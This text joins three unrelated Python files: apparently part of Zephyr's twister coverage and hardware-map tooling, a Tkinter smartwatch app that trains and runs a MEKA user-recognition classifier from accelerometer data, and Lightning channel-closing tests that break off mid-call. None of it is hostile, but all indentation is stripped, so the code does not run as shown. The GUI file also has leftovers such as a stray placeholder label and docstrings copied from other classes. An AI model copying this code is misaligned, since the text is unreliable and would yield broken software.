def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.baud = serial_baud or 115200
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
new_dut = DUT(platform=platform,
product=product,
runner=runner,
id=id,
serial=serial,
serial_baud=baud,
connected=serial is not None,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
s_dev.lock = None
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
|
GUI.py
|
from Tkinter import *
import os.path
from chronoslib import *
import time
import threading
import ctypes
import os
import operator
addUser = None
recognizeUser = None
global_frame = None
common_box = None
v0 = Tk()
class User(object):
"""A user from the user recognition system. Users have the
following properties:
Attributes:
ID: A string representing the user's identification.
age: A integer with the user's age.
gender: A string with the user's gender.
fitness: An integer with the user fitness (values from 1 to 5).
"""
def __init__(self, ID):
"""Return a Customer object whose name is *name* and starting
balance is *balance*."""
self.ID = ID
self.age = 0
self.gender = 'none'
self.fitness = 1
def getID(self):
return self.ID
def getAge(self):
return self.age
def getGender(self):
return self.gender
def getFitness(self):
return self.fitness
def setID(self, ID):
self.ID = ID
def setAge(self, age):
self.age = age
def setGender(self, gender):
self.gender = gender
def setFitness(self, fitness):
self.fitness = fitness
def addUser(self, ID, age, gender, fitness):
self.ID = ID
self.age = age
self.gender = gender
self.fitness = fitness
class Activity(object):
"""Activities that are recognised by the system. Activities have the
following properties:
Attributes:
ID: An int indicating the algorithm name.
name: A string indicating the activity name.
train_time: an int indicating the needed training time for the activity.
"""
def __init__(self, ID, name, train_time):
self.ID = ID
self.name = name
self.train_time = train_time
def setID(self, ID):
self.ID = ID
def setName(self, name):
self.name = name
def setTrain_time(self, train_time):
self.train_time = train_time
def getID(self):
return self.ID
def getName(self):
return self.name
def getTrain_time(self):
return self.train_time
class Model(object):
"""Machine learning model to recognize users. Models have the
following properties:
Attributes:
algorithm: A string indicating the algorithm name.
parameters: A integer vector with the algorithm parameters.
users: An User vector with the users that the model can recognize.
activities: An Activity vector with the activities that the model can recognize.
"""
def __init__(self, algorithm, parameters):
self.algorithm = algorithm
self.parameters = parameters
self.users = []
self.activities = []
def setAlgorithm(self, algorithm):
self.algorithm = algorithm
def setParameters(self, parameters):
self.parameters = parameters
def setUsers(self, users):
self.users = users
def setActivities(self, activities):
self.activities = activities
def addUser(self, user):
self.users.append(user)
def addActivity(self, activity):
self.activities.append(activity)
def getAlgorithm(self):
return self.algorithm
def getParameters(self):
return self.parameters
def getUsers(self):
return self.users
def getActivities(self):
return self.activities
class ACCData(object):
"""ACC information from the smartwatch. ACCData has the
following properties:
Attributes:
x: A string indicating the algorithm name.
y: A integer vector with the algorithm parameters.
z: An User vector with the users that the model can recognize.
"""
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
def getX(self):
return self.x
def getY(self):
return self.y
def getZ(self):
return self.z
def terminate_thread(thread):
"""Terminates a python thread from another thread.
:param thread: a threading.Thread instance
"""
if thread is None or not thread.isAlive():
return
exc = ctypes.py_object(SystemExit)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(
ctypes.c_long(thread.ident), exc)
if res == 0:
raise ValueError("nonexistent thread id")
elif res > 1:
# """if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"""
ctypes.pythonapi.PyThreadState_SetAsyncExc(thread.ident, None)
raise SystemError("PyThreadState_SetAsyncExc failed")
def keep_flat(event): # on click,
if event.widget is addUser or event.widget is recognizeUser: # if the click came from the button
event.widget.config(relief=FLAT) # enforce an option
def train(information, but):
global common_box
global model
global global_frame
global v0
user = User(len(model.getUsers()))
model.addUser(user)
# Check if there is a data file to create the classifier
with open('data.arff', 'r') as input_file, open('data.csv', 'a+') as output_file:
users = '{'
for x in range(0, len(model.getUsers())):
users += str(x) + ','
users = users[:-1]
old_users = users[:-2]
old_users += '}'
users += '}'
if os.stat(input_file.name).st_size == 0:
activities = '{'
for x in range(0, len(model.getActivities())):
activities += str(x) + ','
activities = activities[:-1]
activities += '}'
output_file.write(
'@relation \'Accelerometer: -C 2\'\n\n@attribute activity- ' + activities + '\n@attribute user- ' + users + '\n@attribute x numeric\n@attribute y numeric\n@attribute z numeric\n\n@data\n')
else:
for line in input_file:
if line == ('@attribute user- ' + old_users + '\n'):
output_file.write('@attribute user- ' + users + '\n')
else:
output_file.write(line)
# Start to record data for each activity
fd = port_open()
start_ap(fd)
ide = user.getID()
for x in model.getActivities():
# Get activity x data
info = "Training period for activity " + str(x.getID()) + " (" + x.getName() + ") started. \nPlease, perform this action for " + str(x.getTrain_time()) + " seconds."
information.config(text=info)
t_end = time.time() + x.getTrain_time()
while time.time() < t_end:
r = get_acc_data(fd)
if r:
output_file.write(str(x.getID()) + ',' + str(ide) + ',' + str(r[0]) + ',' + str(r[1]) + ',' + str(r[2]) + '\n')
stop_ap(fd)
info = "Training process completed. Please wait until the model is updated."
information.config(text=info)
# Train the system
if os.path.isfile('./data.arff'):
os.remove('./data.arff')
os.rename('./data.csv', './data.arff')
with open('./data.arff', 'a+') as f:
os.system(
'java -cp ".\meka-release-1.9.1\lib\*" meka.classifiers.multitarget.BCC -t ' + f.name +
' -X Ibf -S 0 -d BccJ48.model -R -W weka.classifiers.trees.J48 -- -C 0.1 -M 10')
# Inform the user that the model has been updated to include them
information.config(text='User added to the system.')
but.config(text='Return')
def test(information, but):
global common_box
global model
global global_frame
global v0
# Start data collection
with open('./user_data.arff', 'w') as f:
# Get the activities
activities = '{'
for x in range(0, len(model.getActivities())):
activities += str(x) + ','
activities = activities[:-1]
activities += '}'
# Get the users
users = '{'
for x in range(0, len(model.getUsers())):
users += str(x) + ','
users = users[:-1]
users += '}'
f.write('@relation \'Accelerometer: -C 2\'\n\n@attribute activity- ' + activities + '\n@attribute user- ' + users + '\n@attribute x numeric\n@attribute y numeric\n@attribute z numeric\n\n@data\n')
# Get user data
fd = port_open()
start_ap(fd)
t_end = time.time() + 30
while time.time() < t_end:
r = get_acc_data(fd)
if r:
f.write('?,?,' + str(r[0]) + ',' + str(r[1]) + ',' + str(r[2]) + '\n')
stop_ap(fd)
# Start user recognition
with open('./user_data.arff', 'a+') as f:
if os.stat(f.name).st_size != 0:
os.system(
'java -cp ".\meka-release-1.9.1\lib\*" meka.classifiers.multitarget.BCC -l BccJ48.model -t ' + f.name + ' -T ' + f.name + ' -predictions ./results.csv -no-eval')
# Structure for act_res and us_res: [class, number of times class appears]
act_res = {}
us_res = {}
total = 0
# Calculate user results
with open('./results.csv', 'r') as f:
for line in f:
if 'activity' in line:
continue
else:
# activity-,user-,x,y,z: we use activity and user
res = line.split(',')
total += 1
act = res[0]
us = res[1]
if not act_res:
act_res[act] = 1
else:
if act in act_res:
act_res[act] = act_res.get(act) + 1
else:
act_res[act] = 1
if not us_res:
us_res[us] = 1
else:
if us in us_res:
us_res[us] = us_res.get(us) + 1
else:
us_res[us] = 1
# Calculate the accuracy of the result
# Activity:
act = max(act_res.iteritems(), key=operator.itemgetter(1))[0]
# User:
us = max(us_res.iteritems(), key=operator.itemgetter(1))[0]
act_stat = (act_res.get(act)*100) / total
us_stat = (us_res.get(us)*100) / total
act_name = ''
for x in model.getActivities():
if x.getID() == act:
act_name = x.getName()
information.config(text='culo')
# Inform the user of the results
info = 'Data belongs to user ' + str(us) + ' with a probability of ' + str(us_stat) + '%\n while ' + act_name + ' with a probability of ' + str(act_stat) + '%.'
information.config(text=info)
but.config(text='Return')
model = Model('J48', None)
train_thread = None
recognize_thread = None
def add():
global global_frame
global model
global common_box
global train_thread
v0.configure(background='white')
global_frame.destroy()
global_frame = Frame(v0)
global_frame.configure(background='white')
text_frame = Frame(global_frame)
text = Text(text_frame, bg="black", height=1.4, width=58, relief=FLAT)
text.insert(INSERT, "User recognition > ")
text.insert(END, "Add user")
text.pack()
text.tag_add("first", "1.0", "1.18")
text.tag_add("second", "1.18", "1.28")
text.tag_config("first", foreground="#8A8A8A")
text.tag_config("second", foreground="white")
text.configure(pady=8, padx=15)
text_frame.pack(side=TOP, expand=NO, fill=NONE)
common_box = Frame(global_frame)
common_box.configure(background='white')
# info = StringVar()
info = "Initiating training period. Please, wait..."
information = Label(common_box, text=info, pady=30, padx=30)
information.configure(background="white")
# info.set("Training period for activity 1 (resting) started. Please, wait...")
information.pack()
but_frame = Frame(common_box)
but = Button(but_frame, text="Cancel", bg='#8A8A8A', fg='white', command=mainScreen, relief=FLAT, padx=5, pady=4)
but.pack(side=LEFT, padx=10, pady=5)
but_frame.configure(background='white')
but_frame.pack(side=BOTTOM)
v0.bind('<Button-3>', keep_flat)
common_box.pack()
global_frame.pack()
# MEKA events
train_thread = threading.Thread(target=train, args=[information, but])
train_thread.start()
v0.mainloop()
def recognize():
global global_frame
global model
global recognize_thread
v0.configure(background='white')
global_frame.destroy()
global_frame = Frame(v0)
global_frame.configure(background='white')
text_frame = Frame(global_frame)
text = Text(text_frame, bg="black", height=1.4, width=58, relief=FLAT)
text.insert(INSERT, "User recognition > ")
text.insert(END, "Recognize user")
text.pack()
text.tag_add("first", "1.0", "1.18")
text.tag_add("second", "1.18", "1.36")
text.tag_config("first", foreground="#8A8A8A")
text.tag_config("second", foreground="white")
text.configure(pady=8, padx=15)
text_frame.pack(side=TOP, expand=NO, fill=NONE)
info = "Collecting user data. Please, stand by..."
information = Label(global_frame, text=info, pady=30, padx=30)
information.configure(background="white")
information.pack()
but_frame = Frame(global_frame)
but = Button(but_frame, text="Cancel", bg='#8A8A8A', fg='white', command=mainScreen, relief=FLAT, padx=5,
pady=4)
but.pack(side=LEFT, padx=10, pady=5)
but_frame.configure(background='white')
but_frame.pack(side=BOTTOM)
v0.bind('<Button-4>', keep_flat)
global_frame.pack()
# MEKA events
recognize_thread = threading.Thread(target=test, args=[information, but])
recognize_thread.start()
v0.mainloop()
def mainScreen():
global addUser
global recognizeUser
global global_frame
global v0
global train_thread
global recognize_thread
terminate_thread(train_thread)
terminate_thread(recognize_thread)
v0.configure(background='white')
v0.option_add("*Font", "TkDefaultFont")
if global_frame is not None:
global_frame.destroy()
global_frame = Frame(v0)
global_frame.configure(background='white')
var = StringVar()
label = Label(global_frame, textvariable=var, bg='black', fg='white', anchor="w", pady=8, padx=15)
var.set("User recognition")
label.pack(fill=BOTH, expand=1)
info = StringVar()
information = Label(global_frame, textvariable=info, pady=30, padx=30)
information.configure(background="white")
info.set("Choose \"Add user\" to incorporate a new user to the system. \n"
"Choose \"Recognize user\" to identify a user that is already \nregistered on the system.")
information.pack()
but_frame = Frame(global_frame)
addUser = Button(but_frame, text="Add user", command=add, bg='#8A8A8A', fg='white', relief=FLAT, padx=20, pady=4)
addUser.pack(side=LEFT, padx=10, pady=5)
recognizeUser = Button(but_frame, text="Recognize user", bg='white', command=recognize, relief=FLAT, padx=5, pady=4)
recognizeUser.pack(side=LEFT, padx=10, pady=5)
but_frame.configure(background='white')
but_frame.pack(side=BOTTOM)
v0.bind('<Button-1>', keep_flat)
v0.bind('<Button-2>', keep_flat)
global_frame.pack()
v0.mainloop()
def main():
global model
rest = Activity('0', 'resting', 10)
model.addActivity(rest)
walk = Activity('1', 'walking', 10)
model.addActivity(walk)
run = Activity('2', 'running', 10)
model.addActivity(run)
jump = Activity('3', 'jumping', 10)
model.addActivity(jump)
with open('data.arff', 'a+') as input_file, open('data.csv', 'a+') as output_file:
users = '{'
for x in range(0, len(model.getUsers())):
users += str(x) + ','
users = users[:-1]
users += '}'
activities = '{'
for x in range(0, len(model.getActivities())):
activities += str(x) + ','
activities = activities[:-1]
activities += '}'
if os.stat(input_file.name).st_size == 0:
user = User('0')
model.addUser(user)
users = '{0}'
output_file.write(
'@relation \'Accelerometer: -C 2\'\n\n@attribute activity- ' + activities + '\n@attribute user- ' + users + '\n@attribute x numeric\n@attribute y numeric\n@attribute z numeric\n\n@data\n')
else:
for line in input_file:
if '@attribute activity- ' in line:
output_file.write('@attribute activity- ' + activities + '\n')
elif '@attribute user- ' in line:
output_file.write(line)
aux = line.split(' ')
aux[2] = aux[2][:-2]
aux[2] = aux[2][1:]
us = aux[2].split(',')
for x in us:
user = User(x)
model.addUser(user)
else:
output_file.write(line)
if os.path.isfile('./data.arff'):
os.remove('./data.arff')
os.rename('./data.csv', './data.arff')
mainScreen()
if __name__ == '__main__':
main()
|
test_closing.py
|
from fixtures import * # noqa: F401,F403
from flaky import flaky
from pyln.client import RpcError, Millisatoshi
from shutil import copyfile
from pyln.testing.utils import SLOW_MACHINE
from utils import (
only_one, sync_blockheight, wait_for, TIMEOUT,
account_balance, first_channel_id, closing_fee, TEST_NETWORK,
scriptpubkey_addr, calc_lease_fee, EXPERIMENTAL_FEATURES,
check_utxos_channel, anchor_expected, check_coin_moves,
check_balance_snaps, mine_funding_to_announce
)
import os
import queue
import pytest
import re
import subprocess
import threading
import unittest
@pytest.mark.developer("Too slow without --dev-bitcoind-poll")
def test_closing_simple(node_factory, bitcoind, chainparams):
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2 = node_factory.line_graph(2, opts={'plugin': coin_mvt_plugin})
chan = l1.get_channel_scid(l2)
channel_id = first_channel_id(l1, l2)
fee = closing_fee(3750, 2) if not chainparams['elements'] else 4263
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
]
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
l2.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
# The entry in the channels table should still be there
assert l1.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
assert l2.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('wallet', ['deposit'], None, None)],
}
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('wallet', ['deposit'], None, None)],
}
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
def test_closing_while_disconnected(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
fut = executor.submit(l1.rpc.close, chan, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
fut.result(TIMEOUT)
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(101)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_disconnected_notify(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l2.stop()
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
out = subprocess.check_output(['cli/thor-cli',
'--network={}'.format(TEST_NETWORK),
'--thor-dir={}'
.format(l1.daemon.thor_dir),
'close',
l2.info['id'],
'5']).decode('utf-8').splitlines()
assert out[0] == '# peer is offline, will negotiate once they reconnect (5 seconds before unilateral close).'
assert out[1] == '# Timed out, forcing close.'
assert not any([line.startswith('#') for line in out[2:]])
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fundchannel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@unittest.skipIf(TEST_NETWORK != 'regtest', 'FIXME: broken under elements')
@pytest.mark.slow_test
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/11000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 11000, 15000, 7400], [8000, 6000, 1001, 100]]
balance = [False, True]
num_peers = len(feerates) * len(balance)
addr = l1.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for b in balance:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
p.balance = balance
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6, minconf=0)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
mine_funding_to_announce(bitcoind, peers, num_blocks=6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
